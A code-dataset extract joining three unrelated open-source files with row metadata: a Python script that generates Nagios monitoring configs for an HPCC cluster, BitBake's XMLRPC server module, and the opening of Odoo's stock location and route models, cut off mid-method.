ThorMasters.append(d[i])
return ThorMasters, masterport
def ThorSlave(self):
ParseXML = ET.parse(xml_local)
doc_root = ParseXML.getroot()
Thors = []
for i in doc_root.findall('.//ThorSlaveProcess'):
Thor = i.attrib['computer']
Thors.append(Thor)
d = {}
for i in doc_root.findall('.//Hardware/Computer'):
Machine = i.attrib['name']
IP = i.attrib['netAddress']
d[Machine] = IP
ThorSlaves = []
for i in d:
if i not in Thors:
continue
elif i in Thors:
ThorSlaves.append(d[i])
return ThorSlaves
XML().getXML()
hpcc_component = XMLParser()
# List of HPCC Components from xml file.
dafilesrv = hpcc_component.hpcc_components('Dafilesrv')
dali = hpcc_component.hpcc_master_components('Dali')
sasha = hpcc_component.hpcc_master_components('Sasha')
eclagent = hpcc_component.hpcc_components('EclAgent')
eclccserver = hpcc_component.hpcc_components('EclccServer')
eclserver = hpcc_component.hpcc_components('EclServer')
dfuserver = hpcc_component.hpcc_components('DfuServer')
eclscheduler = hpcc_component.hpcc_components('EclScheduler')
esp = hpcc_component.Esp()
roxie = hpcc_component.Roxie()
thormaster = hpcc_component.ThorMaster()
thorslave = hpcc_component.ThorSlave()
print('=== list of IP Addresses ==='), '\n', dafilesrv, '\n'
print('Number of servers = '), len(dafilesrv), '\n'
print('=========================== Main Components =======================', '\n')
print('dali = '), dali, '\n'
print('sasha = '), sasha, '\n'
print('eclagent = '), eclagent, '\n'
print('Number of ECLAgents = '), len(eclagent), '\n'
print('eclccserver = ', eclccserver, '\n')
print('Number of eclccservers = '), len(eclccserver), '\n'
print('eclserver = '), eclserver, '\n'
print('Number of eclservers = '), len(eclserver), '\n'
print('dfuserver = ', dfuserver, '\n')
print('Number of DFUServers = '), len(dfuserver), '\n'
print('eclscheduler = '), eclscheduler, '\n'
print('Number of schedulers = '), len(eclscheduler), '\n'
print('esp = '), esp, '\n'
print('Number of ESP Servers = '), len(esp), '\n'
print('Roxie = '), roxie, '\n'
print('Number of Roxie Servers = '), len(roxie), '\n'
print('ThorMaster = ', thormaster[0], '\n')
print('Number of ThorMaster Nodes = '), len(thormaster[0]), '\n'
if len(thormaster[1]) > 0:
print('Port Layout = '), thormaster[1], '\n'
print('ThorSlaves = '), thorslave, '\n'
print('Number of ThorSlaves = '), len(thorslave), '\n'
print('======================================================================', '\n')
### Creating directory structure
EnvironmentDirectory = '/etc/HPCCSystems/nagios/{}'.format(Environment)
if os.path.isdir(EnvironmentDirectory) == False:
subprocess.call('mkdir -p /etc/HPCCSystems/nagios/{}'.format(Environment), shell=True)
else:
print('Environment already exists')
sys.exit(1)
### Generating host configuration files with basic checks
for ip in dafilesrv:
if ip:
filename = '/etc/HPCCSystems/nagios/{}/{}.cfg'.format(Environment, ip)
config_file = open(filename, 'w')
host_conf = """
define host {{
use {0}
host_name {1}
alias {1}
address {1}
}}
define service {{
use {2}
host_name {1}
service_description Dafilesrv Status
check_command check_dafilesrv
}}
define service {{
use {2}
host_name {1}
service_description SSH Status
check_command check_ssh
}}
""".format(HostDefinition, ip, ServiceDefinition)
config_file.write(host_conf)
config_file.close()
### Appending Dali entry to host configuration file
def InsertDaliEntry():
filename = '/etc/HPCCSystems/nagios/{}/{}.cfg'.format(Environment, dali[0])
config_file = open(filename, 'a')
host_conf = """
define service {{
use {}
host_name {}
service_description Dali Service Status
check_command check_dali!{}!5000
}}
""".format(ServiceDefinition, dali[0], dali[1])
config_file.write(host_conf)
config_file.close()
### Appending Sasha entry to host configuration file
def InsertSashaEntry():
filename = '/etc/HPCCSystems/nagios/{}/{}.cfg'.format(Environment, sasha[0])
config_file = open(filename, 'a')
host_conf = """
define service {{
use {}
host_name {}
service_description Sasha Service Status
check_command check_sasha!{}!5000
}}
""".format(ServiceDefinition, sasha[0], sasha[1])
config_file.write(host_conf)
config_file.close()
### Appending ESP entry to host configuration file
def InsertESPServerEntry():
for ip in esp:
filename = '/etc/HPCCSystems/nagios/{}/{}.cfg'.format(Environment, ip)
config_file = open(filename, 'a')
for port in esp[ip]:
host_conf = """
define service {{
use {0}
host_name {1}
service_description ESP Status port {2}
check_command check_esp!{2}
}}
""".format(ServiceDefinition, ip, port)
config_file.write(host_conf)
config_file.close()
### Appending Roxie entry to host configuration file
def InsertRoxieEntry():
if roxie:
for ip in roxie:
filename = '/etc/HPCCSystems/nagios/{}/{}.cfg'.format(Environment, ip)
config_file = open(filename, 'a')
host_conf = """
define service {{
use {}
host_name {}
service_description Roxie Status
check_command check_roxie
}}
""".format(ServiceDefinition, ip)
config_file.write(host_conf)
config_file.close()
### Appending ThorMaster entry to host configuration file
def InsertThorMasterEntry():
if thormaster:
for ip in thormaster[0]:
if len(thormaster[1]) > 0:
for port in thormaster[1][ip]:
filename = '/etc/HPCCSystems/nagios/{}/{}.cfg'.format(Environment, ip)
config_file = open(filename, 'a')
host_conf = """
define service {{
use {0}
host_name {1}
service_description ThorMaster Status port {2}
check_command check_thormaster!{2}
}}
""".format(ServiceDefinition, ip, int(port[0]))
config_file.write(host_conf)
config_file.close()
else:
filename = '/etc/HPCCSystems/nagios/{}/{}.cfg'.format(Environment, ip)
config_file = open(filename, 'a')
host_conf = """
define service {{
use {}
host_name {}
service_description ThorMaster Status port 20000
check_command check_thormaster!20000
}}
""".format(ServiceDefinition, ip)
config_file.write(host_conf)
config_file.close()
### Appending new entries to hostgroup file
def EditHostGroups():
hostgroup_filename = open('/etc/HPCCSystems/nagios/{0}/{0}_hostgroup.cfg'.format(Environment), 'a')
cleanup = ','.join(dafilesrv)
bulk = """
define hostgroup {{
hostgroup_name {0}
alias {0}
members {1}
}}
""".format(Environment, cleanup)
hostgroup_filename.write(bulk)
hostgroup_filename.close()
def hpccCommands():
filename = '/etc/HPCCSystems/nagios/hpcc_objects/hpcc_commands.cfg'
if os.path.isfile(filename) == False:
config_file = open(filename, 'a')
command_conf = """
### HPCC Platform Checks ###
define command{
command_name check_dafilesrv
command_line /usr/lib/nagios/plugins/check_dafilesrv $HOSTADDRESS$
}
define command{
command_name check_dali
command_line /usr/lib/nagios/plugins/check_dali $HOSTADDRESS$ $ARG1$ $ARG2$
}
define command{
command_name check_roxie
command_line /usr/lib/nagios/plugins/check_roxie $HOSTADDRESS$
}
define command{
command_name check_sasha
command_line /usr/lib/nagios/plugins/check_sasha $HOSTADDRESS$ $ARG1$ $ARG2$
}
### HPCC Custom Checks ###
define command{
command_name check_esp
command_line /usr/local/nagios/libexec/check_tcp -H $HOSTADDRESS$ -p $ARG1$
}
define command{
command_name check_thormaster
command_line /usr/local/nagios/libexec/check_tcp -H $HOSTADDRESS$ -p $ARG1$
}
"""
config_file.write(command_conf)
config_file.close()
def hpccTimePeriods():
filename = '/etc/HPCCSystems/nagios/hpcc_objects/hpcc_timeperiods.cfg'
if os.path.isfile(filename) == False:
config_file = open(filename, 'a')
definitions_conf = """
# This defines a timeperiod where all times are valid for checks,
# notifications, etc. The classic "24x7" support nightmare. :-)
define timeperiod{
timeperiod_name hpcc-24x7
alias 24 Hours A Day, 7 Days A Week
sunday 00:00-24:00
monday 00:00-24:00
tuesday 00:00-24:00
wednesday 00:00-24:00
thursday 00:00-24:00
friday 00:00-24:00
saturday 00:00-24:00
}
# 'workhours/banker hours' timeperiod definition for non-production systems
define timeperiod{
timeperiod_name hpcc-workhours
alias Normal Work Hours
monday 06:00-17:00
tuesday 06:00-17:00
wednesday 06:00-17:00
thursday 06:00-17:00
friday 06:00-17:00
}
"""
config_file.write(definitions_conf)
config_file.close()
def hpccContacts():
filename = '/etc/HPCCSystems/nagios/hpcc_objects/hpcc_contacts.cfg'
if os.path.isfile(filename) == False:
config_file = open(filename, 'a')
definitions_conf = """
define contact{
contact_name hpcc_support_team ; Short name of user
use generic-contact ; Inherit default values from generic-contact template
alias ; Full name of user
email somedistributionlist@someplace.com ; <<***** CHANGE THIS TO YOUR EMAIL ADDRESS ******
}
define contactgroup{
contactgroup_name hpcc-admins
alias hpcc-administrators
members hpcc_support_team
}
"""
config_file.write(definitions_conf)
config_file.close()
def hpccProdDefinitions():
filename = '/etc/HPCCSystems/nagios/hpcc_objects/hpcc_prod_definitions.cfg'
if os.path.isfile(filename) == False:
config_file = open(filename, 'a')
definitions_conf = """
# HPCC Host Definition
define host{
name generic-prod-hpcc ; The name of this host template
notifications_enabled 1 ; Host notifications are enabled
event_handler_enabled 1 ; Host event handler is enabled
flap_detection_enabled 1 ; Flap detection is enabled
process_perf_data 1 ; Process performance data
retain_status_information 1 ; Retain status information across program restarts
retain_nonstatus_information 1 ; Retain non-status information across program restarts
notification_period hpcc-24x7 ; Send host notifications at any time
notification_interval 30 ; Resend notifications every 30 minutes
notification_options d,r ; Only send notifications for specific host states
contact_groups hpcc-admins ; Notifications get sent to the admins by default
check_period hpcc-24x7 ; By default, switches are monitored round the clock
check_interval m5 ; Switches are checked every 5 minutes
retry_interval 1 ; Schedule host check retries at 1 minute intervals
max_check_attempts 10 ; Check each switch 10 times (max)
check_command check-host-alive ; Default command to check if routers are "alive"
register 0 ; DONT REGISTER THIS DEFINITION - ITS NOT A REAL HOST, JUST A TEMPLATE!
}
# HPCC Service Definition
define service{
name hpcc-prod-service ; The 'name' of this service template
active_checks_enabled 1 ; Active service checks are enabled
passive_checks_enabled 1 ; Passive service checks are enabled/accepted
parallelize_check 1 ; Active service checks should be parallelized (disabling this can lead to major performance problems)
obsess_over_service 1 ; We should obsess over this service (if necessary)
check_freshness 0 ; Default is to NOT check service 'freshness'
notifications_enabled 1 ; Service notifications are enabled
event_handler_enabled 1 ; Service event handler is enabled
flap_detection_enabled 1 ; Flap detection is enabled
process_perf_data 1 ; Process performance data
retain_status_information 1 ; Retain status information across program restarts
retain_nonstatus_information 1 ; Retain non-status information across program restarts
is_volatile 0 ; The service is not volatile
check_period hpcc-24x7 ; The service can be checked at any time of the day
max_check_attempts 3 ; Re-check the service up to 3 times in order to determine its final (hard) state
normal_check_interval 10 ; Check the service every 10 minutes under normal conditions
retry_check_interval 2 ; Re-check the service every two minutes until a hard state can be determined
contact_groups hpcc-admins ; Notifications get sent out to everyone in the 'admins' group
notification_options w,u,c,r ; Send notifications about warning, unknown, critical, and recovery events
notification_interval 60 ; Re-notify about service problems every hour
notification_period hpcc-24x7 ; Notifications can be sent out at any time
register 0 ; DONT REGISTER THIS DEFINITION - ITS NOT A REAL SERVICE, JUST A TEMPLATE!
}
"""
config_file.write(definitions_conf)
config_file.close()
def hpccNonProdDefinitions():
filename = '/etc/HPCCSystems/nagios/hpcc_objects/hpcc_nonprod_definitions.cfg'
if os.path.isfile(filename) == False:
config_file = open(filename, 'a')
definitions_conf = """
# HPCC Host Definition
define host{
name generic-nonprod-hpcc ; The name of this host template
notifications_enabled 1 ; Host notifications are enabled
event_handler_enabled 1 ; Host event handler is enabled
flap_detection_enabled 1 ; Flap detection is enabled
process_perf_data 1 ; Process performance data
retain_status_information 1 ; Retain status information across program restarts
retain_nonstatus_information 1 ; Retain non-status information across program restarts
notification_period hpcc-workhours ; Send host notifications at any time
notification_interval 30 ; Resend notifications every 30 minutes
notification_options d,r ; Only send notifications for specific host states
contact_groups hpcc-admins ; Notifications get sent to the admins by default
check_period hpcc-24x7 ; By default, switches are monitored round the clock
check_interval m5 ; Switches are checked every 5 minutes
retry_interval 1 ; Schedule host check retries at 1 minute intervals
max_check_attempts 10 ; Check each switch 10 times (max)
check_command check-host-alive ; Default command to check if routers are "alive"
register 0 ; DONT REGISTER THIS DEFINITION - ITS NOT A REAL HOST, JUST A TEMPLATE!
}
# HPCC Service Definition
define service{
name hpcc-nonprod-service
active_checks_enabled 1
passive_checks_enabled 1
parallelize_check 1
obsess_over_service 1
check_freshness 0
notifications_enabled 1
event_handler_enabled 1
flap_detection_enabled 1
process_perf_data 1
retain_status_information 1
retain_nonstatus_information 1
is_volatile 0
check_period hpcc-24x7
max_check_attempts 3
normal_check_interval 10
retry_check_interval 2
contact_groups hpcc-admins
notification_options w,u,c,r
notification_interval 60
notification_period hpcc-workhours
register 0
}
"""
config_file.write(definitions_conf)
config_file.close()
### Creating configuration files
InsertDaliEntry()
InsertSashaEntry()
InsertESPServerEntry()
InsertRoxieEntry()
InsertThorMasterEntry()
EditHostGroups()
hpccTimePeriods()
hpccContacts()
hpccCommands()
hpccProdDefinitions()
hpccNonProdDefinitions()
### Changing file ownership
subprocess.call('chown nagios. /etc/HPCCSystems/nagios/ -R', shell=True)
### Restarting Nagios application
subprocess.call('systemctl restart nagios.service', shell=True)
|
apache-2.0
| 1,601,087,806,931,783,200
| 37.804762
| 166
| 0.553565
| false
| 4.128166
| true
| false
| false
|
dellysunnymtech/bitbake
|
lib/bb/server/xmlrpc.py
|
1
|
13251
|
#
# BitBake XMLRPC Server
#
# Copyright (C) 2006 - 2007 Michael 'Mickey' Lauer
# Copyright (C) 2006 - 2008 Richard Purdie
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
"""
This module implements an xmlrpc server for BitBake.
Use this by deriving a class from BitBakeXMLRPCServer and then adding
methods which you want to "export" via XMLRPC. If the methods have the
prefix xmlrpc_, then registering those function will happen automatically,
if not, you need to call register_function.
Use register_idle_function() to add a function which the xmlrpc server
calls from within server_forever when no requests are pending. Make sure
that those functions are non-blocking or else you will introduce latency
in the server's main loop.
"""
import bb
import xmlrpclib, sys
from bb import daemonize
from bb.ui import uievent
import hashlib, time
import socket
import os, signal
import threading
try:
import cPickle as pickle
except ImportError:
import pickle
DEBUG = False
from SimpleXMLRPCServer import SimpleXMLRPCServer, SimpleXMLRPCRequestHandler
import inspect, select, httplib
from . import BitBakeBaseServer, BitBakeBaseServerConnection, BaseImplServer
class BBTransport(xmlrpclib.Transport):
def __init__(self, timeout):
self.timeout = timeout
self.connection_token = None
xmlrpclib.Transport.__init__(self)
# Modified from default to pass timeout to HTTPConnection
def make_connection(self, host):
#return an existing connection if possible. This allows
#HTTP/1.1 keep-alive.
if self._connection and host == self._connection[0]:
return self._connection[1]
# create a HTTP connection object from a host descriptor
chost, self._extra_headers, x509 = self.get_host_info(host)
#store the host argument along with the connection object
self._connection = host, httplib.HTTPConnection(chost, timeout=self.timeout)
return self._connection[1]
def set_connection_token(self, token):
self.connection_token = token
def send_content(self, h, body):
if self.connection_token:
h.putheader("Bitbake-token", self.connection_token)
xmlrpclib.Transport.send_content(self, h, body)
def _create_server(host, port, timeout = 60):
t = BBTransport(timeout)
s = xmlrpclib.ServerProxy("http://%s:%d/" % (host, port), transport=t, allow_none=True)
return s, t
class BitBakeServerCommands():
def __init__(self, server):
self.server = server
self.has_client = False
def registerEventHandler(self, host, port):
"""
Register a remote UI Event Handler
"""
s, t = _create_server(host, port)
# we don't allow connections if the cooker is running
if (self.cooker.state in [bb.cooker.state.parsing, bb.cooker.state.running]):
return None
self.event_handle = bb.event.register_UIHhandler(s)
return self.event_handle
def unregisterEventHandler(self, handlerNum):
"""
Unregister a remote UI Event Handler
"""
return bb.event.unregister_UIHhandler(handlerNum)
def runCommand(self, command):
"""
Run a cooker command on the server
"""
return self.cooker.command.runCommand(command, self.server.readonly)
def getEventHandle(self):
return self.event_handle
def terminateServer(self):
"""
Trigger the server to quit
"""
self.server.quit = True
print("Server (cooker) exiting")
return
def addClient(self):
if self.has_client:
return None
token = hashlib.md5(str(time.time())).hexdigest()
self.server.set_connection_token(token)
self.has_client = True
return token
def removeClient(self):
if self.has_client:
self.server.set_connection_token(None)
self.has_client = False
if self.server.single_use:
self.server.quit = True
# This request handler checks if the request has a "Bitbake-token" header
# field (this comes from the client side) and compares it with its internal
# "Bitbake-token" field (this comes from the server). If the two are not
# equal, it is assumed that a client is trying to connect to the server
# while another client is connected to the server. In this case, a 503 error
# ("service unavailable") is returned to the client.
class BitBakeXMLRPCRequestHandler(SimpleXMLRPCRequestHandler):
def __init__(self, request, client_address, server):
self.server = server
SimpleXMLRPCRequestHandler.__init__(self, request, client_address, server)
def do_POST(self):
try:
remote_token = self.headers["Bitbake-token"]
except:
remote_token = None
if remote_token != self.server.connection_token and remote_token != "observer":
self.report_503()
else:
if remote_token == "observer":
self.server.readonly = True
else:
self.server.readonly = False
SimpleXMLRPCRequestHandler.do_POST(self)
def report_503(self):
self.send_response(503)
response = 'No more client allowed'
self.send_header("Content-type", "text/plain")
self.send_header("Content-length", str(len(response)))
self.end_headers()
self.wfile.write(response)
class XMLRPCProxyServer(BaseImplServer):
""" not a real working server, but a stub for a proxy server connection
"""
def __init__(self, host, port):
self.host = host
self.port = port
class XMLRPCServer(SimpleXMLRPCServer, BaseImplServer):
# remove this when you're done with debugging
# allow_reuse_address = True
def __init__(self, interface):
"""
Constructor
"""
BaseImplServer.__init__(self)
if (interface[1] == 0): # anonymous port, not getting reused
self.single_use = True
# Use auto port configuration
if (interface[1] == -1):
interface = (interface[0], 0)
SimpleXMLRPCServer.__init__(self, interface,
requestHandler=BitBakeXMLRPCRequestHandler,
logRequests=False, allow_none=True)
self.host, self.port = self.socket.getsockname()
self.connection_token = None
#self.register_introspection_functions()
self.commands = BitBakeServerCommands(self)
self.autoregister_all_functions(self.commands, "")
self.interface = interface
self.single_use = False
def addcooker(self, cooker):
BaseImplServer.addcooker(self, cooker)
self.commands.cooker = cooker
def autoregister_all_functions(self, context, prefix):
"""
Convenience method for registering all functions in the scope
of this class that start with a common prefix
"""
methodlist = inspect.getmembers(context, inspect.ismethod)
for name, method in methodlist:
if name.startswith(prefix):
self.register_function(method, name[len(prefix):])
def serve_forever(self):
# Start the actual XMLRPC server
bb.cooker.server_main(self.cooker, self._serve_forever)
def _serve_forever(self):
"""
Serve Requests. Overloaded to honor a quit command
"""
self.quit = False
while not self.quit:
fds = [self]
nextsleep = 0.1
for function, data in self._idlefuns.items():
try:
retval = function(self, data, False)
if retval is False:
del self._idlefuns[function]
elif retval is True:
nextsleep = 0
else:
fds = fds + retval
except SystemExit:
raise
except:
import traceback
traceback.print_exc()
pass
socktimeout = self.socket.gettimeout() or nextsleep
socktimeout = min(socktimeout, nextsleep)
# Mirror what BaseServer handle_request would do
try:
fd_sets = select.select(fds, [], [], socktimeout)
if fd_sets[0] and self in fd_sets[0]:
self._handle_request_noblock()
except IOError:
# we ignore interrupted calls
pass
# Tell idle functions we're exiting
for function, data in self._idlefuns.items():
try:
retval = function(self, data, True)
except:
pass
self.server_close()
return
def set_connection_token(self, token):
self.connection_token = token
class BitBakeXMLRPCServerConnection(BitBakeBaseServerConnection):
def __init__(self, serverImpl, clientinfo=("localhost", 0), observer_only = False, featureset = []):
self.connection, self.transport = _create_server(serverImpl.host, serverImpl.port)
self.clientinfo = clientinfo
self.serverImpl = serverImpl
self.observer_only = observer_only
self.featureset = featureset
def connect(self, token = None):
if token is None:
if self.observer_only:
token = "observer"
else:
token = self.connection.addClient()
if token is None:
return None
self.transport.set_connection_token(token)
self.events = uievent.BBUIEventQueue(self.connection, self.clientinfo)
for event in bb.event.ui_queue:
self.events.queue_event(event)
_, error = self.connection.runCommand(["setFeatures", self.featureset])
if error:
# no need to log it here, the error shall be sent to the client
raise BaseException(error)
return self
def removeClient(self):
if not self.observer_only:
self.connection.removeClient()
def terminate(self):
# Don't wait for server indefinitely
import socket
socket.setdefaulttimeout(2)
try:
self.events.system_quit()
except:
pass
try:
self.connection.removeClient()
except:
pass
class BitBakeServer(BitBakeBaseServer):
def initServer(self, interface = ("localhost", 0)):
self.interface = interface
self.serverImpl = XMLRPCServer(interface)
def detach(self):
daemonize.createDaemon(self.serverImpl.serve_forever, "bitbake-cookerdaemon.log")
del self.cooker
def establishConnection(self, featureset):
self.connection = BitBakeXMLRPCServerConnection(self.serverImpl, self.interface, False, featureset)
return self.connection.connect()
def set_connection_token(self, token):
self.connection.transport.set_connection_token(token)
class BitBakeXMLRPCClient(BitBakeBaseServer):
def __init__(self, observer_only = False, token = None):
self.token = token
self.observer_only = observer_only
# if we need extra caches, just tell the server to load them all
pass
def saveConnectionDetails(self, remote):
self.remote = remote
def establishConnection(self, featureset):
# The format of "remote" must be "server:port"
try:
[host, port] = self.remote.split(":")
port = int(port)
except Exception as e:
bb.warn("Failed to read remote definition (%s)" % str(e))
raise e
# We need our IP for the server connection. We get the IP
# by trying to connect with the server
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect((host, port))
ip = s.getsockname()[0]
s.close()
except Exception as e:
bb.warn("Could not create socket for %s:%s (%s)" % (host, port, str(e)))
raise e
try:
self.serverImpl = XMLRPCProxyServer(host, port)
self.connection = BitBakeXMLRPCServerConnection(self.serverImpl, (ip, 0), self.observer_only, featureset)
return self.connection.connect(self.token)
except Exception as e:
bb.warn("Could not connect to server at %s:%s (%s)" % (host, port, str(e)))
raise e
def endSession(self):
self.connection.removeClient()
|
gpl-2.0
| -5,845,057,423,331,369,000
| 33.871053
| 117
| 0.622066
| false
| 4.302273
| false
| false
| false
|
bplancher/odoo
|
addons/stock/stock.py
|
1
|
300413
|
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from datetime import date, datetime
from dateutil import relativedelta
import json
import time
import sets
import openerp
from openerp.osv import fields, osv
from openerp.tools.float_utils import float_compare, float_round
from openerp.tools.translate import _
from openerp.tools import DEFAULT_SERVER_DATETIME_FORMAT, DEFAULT_SERVER_DATE_FORMAT
from openerp import SUPERUSER_ID, api, models
import openerp.addons.decimal_precision as dp
from openerp.addons.procurement import procurement
import logging
from openerp.exceptions import UserError
_logger = logging.getLogger(__name__)
#----------------------------------------------------------
# Incoterms
#----------------------------------------------------------
class stock_incoterms(osv.osv):
_name = "stock.incoterms"
_description = "Incoterms"
_columns = {
'name': fields.char('Name', required=True, help="Incoterms are series of sales terms. They are used to divide transaction costs and responsibilities between buyer and seller and reflect state-of-the-art transportation practices."),
'code': fields.char('Code', size=3, required=True, help="Incoterm Standard Code"),
'active': fields.boolean('Active', help="By unchecking the active field, you may hide an INCOTERM you will not use."),
}
_defaults = {
'active': True,
}
#----------------------------------------------------------
# Stock Location
#----------------------------------------------------------
class stock_location(osv.osv):
_name = "stock.location"
_description = "Inventory Locations"
_parent_name = "location_id"
_parent_store = True
_parent_order = 'name'
_order = 'parent_left'
_rec_name = 'complete_name'
def _location_owner(self, cr, uid, location, context=None):
''' Return the company owning the location if any '''
return location and (location.usage == 'internal') and location.company_id or False
def _complete_name(self, cr, uid, ids, name, args, context=None):
""" Forms complete name of location from parent location to child location.
@return: Dictionary of values
"""
res = {}
for m in self.browse(cr, uid, ids, context=context):
res[m.id] = m.name
parent = m.location_id
while parent:
res[m.id] = parent.name + '/' + res[m.id]
parent = parent.location_id
return res
def _get_sublocations(self, cr, uid, ids, context=None):
""" return all sublocations of the given stock locations (included) """
if context is None:
context = {}
context_with_inactive = context.copy()
context_with_inactive['active_test'] = False
return self.search(cr, uid, [('id', 'child_of', ids)], context=context_with_inactive)
def _name_get(self, cr, uid, location, context=None):
name = location.name
while location.location_id and location.usage != 'view':
location = location.location_id
name = location.name + '/' + name
return name
def name_get(self, cr, uid, ids, context=None):
res = []
for location in self.browse(cr, uid, ids, context=context):
res.append((location.id, self._name_get(cr, uid, location, context=context)))
return res
_columns = {
'name': fields.char('Location Name', required=True, translate=True),
'active': fields.boolean('Active', help="By unchecking the active field, you may hide a location without deleting it."),
'usage': fields.selection([
('supplier', 'Vendor Location'),
('view', 'View'),
('internal', 'Internal Location'),
('customer', 'Customer Location'),
('inventory', 'Inventory Loss'),
('procurement', 'Procurement'),
('production', 'Production'),
('transit', 'Transit Location')],
'Location Type', required=True,
help="""* Vendor Location: Virtual location representing the source location for products coming from your vendors
\n* View: Virtual location used to create a hierarchical structures for your warehouse, aggregating its child locations ; can't directly contain products
\n* Internal Location: Physical locations inside your own warehouses,
\n* Customer Location: Virtual location representing the destination location for products sent to your customers
\n* Inventory Loss: Virtual location serving as counterpart for inventory operations used to correct stock levels (Physical inventories)
\n* Procurement: Virtual location serving as temporary counterpart for procurement operations when the source (vendor or production) is not known yet. This location should be empty when the procurement scheduler has finished running.
\n* Production: Virtual counterpart location for production operations: this location consumes the raw material and produces finished products
\n* Transit Location: Counterpart location that should be used in inter-companies or inter-warehouses operations
""", select=True),
'complete_name': fields.function(_complete_name, type='char', string="Full Location Name",
store={'stock.location': (_get_sublocations, ['name', 'location_id', 'active'], 10)}),
'location_id': fields.many2one('stock.location', 'Parent Location', select=True, ondelete='cascade'),
'child_ids': fields.one2many('stock.location', 'location_id', 'Contains'),
'partner_id': fields.many2one('res.partner', 'Owner', help="Owner of the location if not internal"),
'comment': fields.text('Additional Information'),
'posx': fields.integer('Corridor (X)', help="Optional localization details, for information purpose only"),
'posy': fields.integer('Shelves (Y)', help="Optional localization details, for information purpose only"),
'posz': fields.integer('Height (Z)', help="Optional localization details, for information purpose only"),
'parent_left': fields.integer('Left Parent', select=1),
'parent_right': fields.integer('Right Parent', select=1),
'company_id': fields.many2one('res.company', 'Company', select=1, help='Let this field empty if this location is shared between companies'),
'scrap_location': fields.boolean('Is a Scrap Location?', help='Check this box to allow using this location to put scrapped/damaged goods.'),
'return_location': fields.boolean('Is a Return Location?', help='Check this box to allow using this location as a return location.'),
'removal_strategy_id': fields.many2one('product.removal', 'Removal Strategy', help="Defines the default method used for suggesting the exact location (shelf) where to take the products from, which lot etc. for this location. This method can be enforced at the product category level, and a fallback is made on the parent locations if none is set here."),
'putaway_strategy_id': fields.many2one('product.putaway', 'Put Away Strategy', help="Defines the default method used for suggesting the exact location (shelf) where to store the products. This method can be enforced at the product category level, and a fallback is made on the parent locations if none is set here."),
'barcode': fields.char('Barcode', copy=False, oldname='loc_barcode'),
}
_defaults = {
'active': True,
'usage': 'internal',
'company_id': lambda self, cr, uid, c: self.pool.get('res.company')._company_default_get(cr, uid, 'stock.location', context=c),
'posx': 0,
'posy': 0,
'posz': 0,
'scrap_location': False,
}
_sql_constraints = [('barcode_company_uniq', 'unique (barcode,company_id)', 'The barcode for a location must be unique per company !')]
def create(self, cr, uid, default, context=None):
if not default.get('barcode', False):
default.update({'barcode': default.get('complete_name', False)})
return super(stock_location, self).create(cr, uid, default, context=context)
def get_putaway_strategy(self, cr, uid, location, product, context=None):
''' Returns the location where the product has to be put, if any compliant putaway strategy is found. Otherwise returns None.'''
putaway_obj = self.pool.get('product.putaway')
loc = location
while loc:
if loc.putaway_strategy_id:
res = putaway_obj.putaway_apply(cr, uid, loc.putaway_strategy_id, product, context=context)
if res:
return res
loc = loc.location_id
def _default_removal_strategy(self, cr, uid, context=None):
return 'fifo'
def get_removal_strategy(self, cr, uid, qty, move, ops=False, context=None):
''' Returns the removal strategy to consider for the given move/ops
:rtype: char
'''
product = move.product_id
location = move.location_id
if product.categ_id.removal_strategy_id:
return product.categ_id.removal_strategy_id.method
loc = location
while loc:
if loc.removal_strategy_id:
return loc.removal_strategy_id.method
loc = loc.location_id
return self._default_removal_strategy(cr, uid, context=context)
def get_warehouse(self, cr, uid, location, context=None):
"""
Returns warehouse id of warehouse that contains location
:param location: browse record (stock.location)
"""
wh_obj = self.pool.get("stock.warehouse")
whs = wh_obj.search(cr, uid, [('view_location_id.parent_left', '<=', location.parent_left),
('view_location_id.parent_right', '>=', location.parent_left)], context=context)
return whs and whs[0] or False
#----------------------------------------------------------
# Routes
#----------------------------------------------------------
class stock_location_route(osv.osv):
_name = 'stock.location.route'
_description = "Inventory Routes"
_order = 'sequence'
_columns = {
'name': fields.char('Route Name', required=True, translate=True),
'sequence': fields.integer('Sequence'),
'pull_ids': fields.one2many('procurement.rule', 'route_id', 'Procurement Rules', copy=True),
'active': fields.boolean('Active', help="If the active field is set to False, it will allow you to hide the route without removing it."),
'push_ids': fields.one2many('stock.location.path', 'route_id', 'Push Rules', copy=True),
'product_selectable': fields.boolean('Applicable on Product', help="When checked, the route will be selectable in the Inventory tab of the Product form. It will take priority over the Warehouse route. "),
'product_categ_selectable': fields.boolean('Applicable on Product Category', help="When checked, the route will be selectable on the Product Category. It will take priority over the Warehouse route. "),
'warehouse_selectable': fields.boolean('Applicable on Warehouse', help="When a warehouse is selected for this route, this route should be seen as the default route when products pass through this warehouse. This behaviour can be overridden by the routes on the Product/Product Categories or by the Preferred Routes on the Procurement"),
'supplied_wh_id': fields.many2one('stock.warehouse', 'Supplied Warehouse'),
'supplier_wh_id': fields.many2one('stock.warehouse', 'Supplying Warehouse'),
'company_id': fields.many2one('res.company', 'Company', select=1, help='Leave this field empty if this route is shared between all companies'),
#Reverse many2many fields:
'product_ids': fields.many2many('product.template', 'stock_route_product', 'route_id', 'product_id', 'Products'),
'categ_ids': fields.many2many('product.category', 'stock_location_route_categ', 'route_id', 'categ_id', 'Product Categories'),
'warehouse_ids': fields.many2many('stock.warehouse', 'stock_route_warehouse', 'route_id', 'warehouse_id', 'Warehouses'),
}
_defaults = {
'sequence': lambda self, cr, uid, ctx: 0,
'active': True,
'product_selectable': True,
'company_id': lambda self, cr, uid, c: self.pool.get('res.company')._company_default_get(cr, uid, 'stock.location.route', context=c),
}
def write(self, cr, uid, ids, vals, context=None):
'''when a route is deactivated, deactivate also its pull and push rules'''
if isinstance(ids, (int, long)):
ids = [ids]
res = super(stock_location_route, self).write(cr, uid, ids, vals, context=context)
if 'active' in vals:
push_ids = []
pull_ids = []
for route in self.browse(cr, uid, ids, context=context):
if route.push_ids:
push_ids += [r.id for r in route.push_ids if r.active != vals['active']]
if route.pull_ids:
